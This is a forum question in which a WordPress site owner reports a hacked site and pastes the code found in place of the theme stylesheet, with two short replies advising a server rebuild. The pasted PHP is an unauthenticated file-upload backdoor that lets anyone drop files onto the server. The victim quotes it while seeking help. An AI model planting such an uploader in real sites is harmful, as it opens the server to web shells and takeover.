WordPress Site Possibly Hacked

July 8, 2014 4.2k views

Today I went to my site (julianlmedina.com) and noticed that my styles were gone. I found out that my theme’s stylesheet has been overwritten with this

    $filedir = ""; 
    $maxfile = '2000000';

    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];
    if (isset($_FILES['image']['name'])) {
        $abod = $filedir.$userfile_name;
        @move_uploaded_file($userfile_tmp, $abod);

echo"<center><b>Done ==> $userfile_name</b></center>";
<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';

I am on an Ubuntu server with SSH and FTP access. Any suggestions? Can I view a log to see if there any weird IP’s logging in?

2 Answers

If you have been compromised, shut down the server immediately and rebuild it from scratch.

That’s what I meant by the server, yes.

Have another answer? Share your knowledge.